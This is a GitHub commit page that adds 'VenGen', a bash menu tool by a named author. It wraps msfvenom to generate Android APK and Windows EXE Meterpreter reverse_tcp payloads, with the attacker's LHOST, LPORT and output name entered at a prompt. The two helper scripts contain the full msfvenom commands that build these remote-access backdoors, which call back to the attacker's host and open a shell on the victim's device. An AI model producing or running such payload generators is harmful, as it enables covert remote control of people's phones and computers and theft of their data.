Skip to content

Commit

Permalink
VenGen Files
Browse files Browse the repository at this point in the history
Required Files for VenGen
  • Loading branch information
niirmaaltwaatii authored Apr 12, 2020
1 parent 69dc557 commit 359c163
Show file tree
Hide file tree
Showing 4 changed files with 80 additions and 0 deletions.
33 changes: 33 additions & 0 deletions VenGen.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
#!/bin/bash
#VenGen_1.0
#ByNiirmaalTwaatii

echo ""
figlet VenGen
echo ""
echo "~~~~~~~~~~~~~ VenGen 1.0 ~~~~~~~~~~~~~"
echo ""
echo "[]>=>=>=>=> By Niirmaal Twaatii ;"
echo ""

echo "-------------------------------------"
echo ""
echo "[1]=>Android Meterpreter Reverse tcp Payload (apk)"
echo "[2]=>Windows Meterpreter Reverse tcp Payload=>(exe)"
echo "[3]=>Help"
echo "[0]=>Exit"
echo ""
echo "-------------------------------------"
echo ""

read -p "[Input]=> " inp

echo ""

case "$inp" in
[1] ) ./android_reverse_tcp.sh;;
[2] ) ./windows_reverse_tcp.sh;;
[3] ) cat help.txt && sleep 5 && ./VenGen.sh;;
[0] ) exit;;
* ) echo "Invalid Command " && ./VenGen.sh;;
esac
21 changes: 21 additions & 0 deletions android_reverse_tcp.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
#!/bin/bash

read -p "LHOST: " lhost
echo ""
echo "[LHOST]=> $lhost"
echo ""
read -p "LPORT: " lport
echo ""
echo "[LPORT]=> $lport"
echo ""
read -p "NAME: " name
echo ""

echo "Generating Payload..."
echo ""

msfvenom -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport -o ${name}.apk

echo ""
echo "Payload Sucessfully Generated !!!"
echo ""
5 changes: 5 additions & 0 deletions help.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

VenGen :-

It is a Tool for Generating msfvenom payloads !

21 changes: 21 additions & 0 deletions windows_reverse_tcp.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
#!/bin/bash

read -p "LHOST: " lhost
echo ""
echo "[LHOST]=> $lhost"
echo ""
read -p "LPORT: " lport
echo ""
echo "[LPORT]=> $lport"
echo ""
read -p "NAME: " name
echo ""

echo "Generating Payload..."
echo ""

msfvenom -p windows/meterpreter/reverse_tcp -f exe lhost=$lhost lport=$lport -o ${name}.exe

echo ""
echo "Payload Sucessfully Generated !!!"
echo ""

0 comments on commit 359c163

Please sign in to comment.